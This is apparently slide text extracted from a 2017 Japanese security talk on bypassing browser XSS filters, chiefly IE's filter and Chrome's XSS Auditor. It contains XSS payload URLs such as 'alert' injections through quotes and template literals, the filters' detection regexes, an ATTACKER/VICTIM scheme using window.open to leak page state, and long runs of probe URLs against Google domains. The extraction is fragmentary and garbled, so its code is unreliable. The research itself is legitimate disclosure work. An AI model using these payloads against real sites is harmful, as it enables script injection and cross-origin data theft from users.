2017/3/30 に行われた Shibuya.XSS techtalk #9 の発表資料です。
❶➌❷❹
https://example.com/?q=">">
https://addons.mozilla.org/ja/firefox/addon/noscript/
HTTP/1.1 200 OK
Date: Tue, 28 Mar 2017 06:16:00 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
https://example.com/?q=">https://example.com/#5382863726995448701">">
">https://example.com/?q=">
https://example.com/?q=">https://example.com/#5382863726995448701
<script> - Google 検索(function(){window.google={kEI: [...]<br/>https://www.google.co.jp/search?q=<script><br/><br/>
<br/>if(jQuery){<br/>// Expected<br/>}else{<br/>// ???<br/>}<br/>https://example.com/?
{{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|((i|(\\u0069))(n|(\\u006[Ee])))).+?{\(}.*?{\)}}[...]{(v|(?0*((86)|(56)|(118)|(76));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*{(b|(?0*((66)|(42)|(98)|(62));?))}([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(s|(?0*((83)|(53)|(115)|(73));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*((c|(?0*((67)|(43)|(99)|(63));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(r|(?0*((82)|(52)|(114)|(72));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(i|(?0*((73)|(49)|(105)|(69));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(p|(?0*((80)|(50)|(112)|(70));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(t|(?0*((84)|(54)|(116)|(74));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*)?(:|(&((#x?0*((58)|(3A));?)|(colon;)))).}{{}{{[...]{{[ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=.}{[...]">
[ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=.">
">[\"\'][ ]*(([^a-z0-9~_:\'\" ])|((i|(\\u0069))(n|(\\u006[Ee])))).+?{\(}.*?{\)}x="";alert(1)//"
https://media.blackhat.com/bh-eu-10/presentations/Lindsay_Nava/BlackHat-EU-2010-Lindsay-Nava-IE8-XSS-Filters-slides.pdf
http://d.hatena.ne.jp/teracc/20090622
https://www.slideshare.net/masatokinugawa/xxn-ja
[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?[.].+?=<br/>q = "";document#body.innerHTML="<xss>";<br/>URL: ?q=";document.body.innerHTML="
[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?[.].+?=<br/><script src="//example.co.jp/test.js"<br/>type="text/javascript"><br/>URL: ?"/++.+++=
"style=:\javascript:-vbscript:-vbs:-",x[]="{toString:"{valueOf:
type="text/javascript">
window#name//Syntax Errorwindow^name//Syntax OK window.name<br/>
url=location.search.slice(1);if(url^indexOf(":")!=-1){url=null;}onload=function(){if(url){location=url;}}
https://example.com/?q=";alert`1`//<br/>q = "";alert`1`//";<br/>https://www.slideshare.net/x00mario/es6-en/34
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes, and everything else
https://example.com/?q=${alert(1)}``//&`+++`https://example.com/?q=[USER_INPUT]<br/>foo=``;<br/>q="[USER_INPUT]";<br/><br/>foo=`#;<br/>q="${alert(1)}#`//";<br/>
https://example.com/?+onfiles+++=.type="text/javascript">[...]
https://bugs.chromium.org/p/chromium/issues/detail?id=654794
http://blog.portswigger.net/2015/08/abusing-chromes-xss-auditor-to-steal.html
https://VICTIM/ https://VICTIM/?IFRAME ERRORhttps://ATTACKER/win=window.open(…) if(win.length == 0){////}else{//}…
https://www.youtube.com/watch?v=IMDWjKFbsJE
HTTP/1.1 200 OK
[...]
Server: gws
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
https://accounts.google.com/ServiceLogin?
google.ae google.as google.ca google.co google.co.in google.co.jp google.co.kr google.co.nz google.co.uk google.com.br google.com.mx google.de google.es google.fr google.it google.pl google.pt google.ru ...(
✨✨✨
{
0 1 2 3 4 5 6 7 8 9 10https://example.com/
0 1 2 3 4 5 6 7 8 9 10https://example.com/?
0x01-08 0x0E-1F!"$%'()*;=^`|~0x09-0D 0x20 +&>#,/:?[\]{}-.@_A a0x000-9 <B-Z b-z
[email protected]{[\"\'`][ ]*(([^a-z0-9~_:\'\"` ])|(in)).+?{[.]}.+?=}
✔✔✔✔
[email protected]
https://www.google.co.jp/?"[email protected]=https://www.google.co.jp/?"[email protected]=https://www.google.co.jp/?"[email protected]=https://www.google.co.jp/?"[email protected]=https://www.google.co.jp/?"[email protected]=https://www.google.co.jp/?"[email protected]=https://www.google.co.jp/?"[email protected]=https://www.google.co.jp/?"[email protected]=https://www.google.co.jp/?"[email protected]=
https://www.google.de/?"[email protected]=https://www.google.de/?"[email protected]=https://www.google.de/?"[email protected]=https://www.google.de/?"[email protected]=https://www.google.de/?"[email protected]=https://www.google.de/?"[email protected]=https://www.google.de/?"[email protected]=https://www.google.de/?"[email protected]=https://www.google.de/?"[email protected]=https://www.google.ru/?"[email protected]=https://www.google.ru/?"[email protected]=
https://www.google.ru/?"[email protected]=https://www.google.ru/?"[email protected]=https://www.google.ru/?"[email protected]=https://www.google.ru/?"[email protected]=https://www.google.ru/?"[email protected]=https://www.google.ru/?"[email protected]=https://www.google.ru/?"[email protected]=https://www.google.ca/?"[email protected]=...